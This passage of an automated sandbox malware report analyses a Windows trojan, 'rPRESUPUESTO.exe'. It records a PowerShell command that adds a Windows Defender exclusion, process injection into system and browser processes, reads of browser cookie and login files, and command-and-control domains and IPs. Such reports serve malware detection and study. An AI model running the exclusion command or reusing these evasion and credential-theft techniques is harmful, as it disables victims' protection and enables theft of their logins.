            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E75D mov eax, dword ptr fs:[00000030h]5_2_0185E75D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C6A6 mov eax, dword ptr fs:[00000030h]5_2_0180C6A6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018066B0 mov eax, dword ptr fs:[00000030h]5_2_018066B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EC640 mov eax, dword ptr fs:[00000030h]5_2_017EC640
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0180A6C7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A6C7 mov eax, dword ptr fs:[00000030h]5_2_0180A6C7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D262C mov eax, dword ptr fs:[00000030h]5_2_017D262C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE627 mov eax, dword ptr fs:[00000030h]5_2_017EE627
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018506F1 mov eax, dword ptr fs:[00000030h]5_2_018506F1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018506F1 mov eax, dword ptr fs:[00000030h]5_2_018506F1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E609 mov eax, dword ptr fs:[00000030h]5_2_0184E609
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812619 mov eax, dword ptr fs:[00000030h]5_2_01812619
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01806620 mov eax, dword ptr fs:[00000030h]5_2_01806620
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808620 mov eax, dword ptr fs:[00000030h]5_2_01808620
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A660 mov eax, dword ptr fs:[00000030h]5_2_0180A660
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A660 mov eax, dword ptr fs:[00000030h]5_2_0180A660
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189866E mov eax, dword ptr fs:[00000030h]5_2_0189866E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189866E mov eax, dword ptr fs:[00000030h]5_2_0189866E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4690 mov eax, dword ptr fs:[00000030h]5_2_017D4690
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4690 mov eax, dword ptr fs:[00000030h]5_2_017D4690
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01802674 mov eax, dword ptr fs:[00000030h]5_2_01802674
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F6962 mov eax, dword ptr fs:[00000030h]5_2_017F6962
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F6962 mov eax, dword ptr fs:[00000030h]5_2_017F6962
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F6962 mov eax, dword ptr fs:[00000030h]5_2_017F6962
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018589B3 mov esi, dword ptr fs:[00000030h]5_2_018589B3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018589B3 mov eax, dword ptr fs:[00000030h]5_2_018589B3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018589B3 mov eax, dword ptr fs:[00000030h]5_2_018589B3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018669C0 mov eax, dword ptr fs:[00000030h]5_2_018669C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018049D0 mov eax, dword ptr fs:[00000030h]5_2_018049D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189A9D3 mov eax, dword ptr fs:[00000030h]5_2_0189A9D3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8918 mov eax, dword ptr fs:[00000030h]5_2_017C8918
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8918 mov eax, dword ptr fs:[00000030h]5_2_017C8918
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E9E0 mov eax, dword ptr fs:[00000030h]5_2_0185E9E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018029F9 mov eax, dword ptr fs:[00000030h]5_2_018029F9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018029F9 mov eax, dword ptr fs:[00000030h]5_2_018029F9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E908 mov eax, dword ptr fs:[00000030h]5_2_0184E908
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E908 mov eax, dword ptr fs:[00000030h]5_2_0184E908
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185C912 mov eax, dword ptr fs:[00000030h]5_2_0185C912
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtQueryValueKey: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtOpenKeyEx: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe; Memory written: C:\Users\user\Desktop\rPRESUPUESTO.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe; Section loaded: NULL target: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe; Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ktmutil.exe; Section loaded: NULL target: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe protection: read write
            Source: C:\Windows\SysWOW64\ktmutil.exe; Section loaded: NULL target: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ktmutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\ktmutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ktmutil.exe; Thread register set: target process: 4268
            Source: C:\Windows\SysWOW64\ktmutil.exe; Thread APC queued: target process: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe; Process created: C:\Users\user\Desktop\rPRESUPUESTO.exe "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe; Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
            Source: C:\Windows\SysWOW64\ktmutil.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 BlobJump to behavior

            Stealing of Sensitive Information

            Source: Yara match | File source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\ktmutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Modify Registry | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 111 Disable or Modify Tools | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 41 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 412 Process Injection | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Abuse Elevation Control Mechanism | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 4 Obfuscated Files or Information | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Software Packing | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Timestomp | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 DLL Side-Loading | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            [Behavior graph (image not reproduced). Behavior Graph ID: 1465409; Sample: rPRESUPUESTO.exe; Startdate: 01/07/2024; Architecture: WINDOWS; Score: 100]
            Sample-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Performs DNS queries to domains with low reputation (www.quantumvoil.xyz); 7 other signatures
            Process tree:
            rPRESUPUESTO.exe (started): Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes; dropped C:\Users\user\...\rPRESUPUESTO.exe.log (ASCII)
              rPRESUPUESTO.exe (started): Maps a DLL or memory area into another process
                MqDMLUHvZmSMqiwTfIsHo.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                  ktmutil.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                    MqDMLUHvZmSMqiwTfIsHo.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); network: www.quantumvoil.xyz (203.161.62.199), www.rlplatro.sbs (109.123.121.243), 12 other IPs or domains
                    firefox.exe (started)
              powershell.exe (started): Loading BitLocker PowerShell Module
                WmiPrvSE.exe (started)
                conhost.exe (started)

            Source | Detection | Scanner | Label | Link
            rPRESUPUESTO.exe | 68% | ReversingLabs | Win32.Trojan.Leonem |
            rPRESUPUESTO.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                              unknown
                                              https://www.google.comktmutil.exe, 00000009.00000002.4589157081.0000000004032000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004012000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://gq64q4.cn/user/design/clas/euse/sksueqquqf/81ktmutil.exe, 00000009.00000002.4589157081.0000000003EA0000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000003E80000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/o-spolecnosti/obchodni-podminkyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/library/theme/hp16/style.cssktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
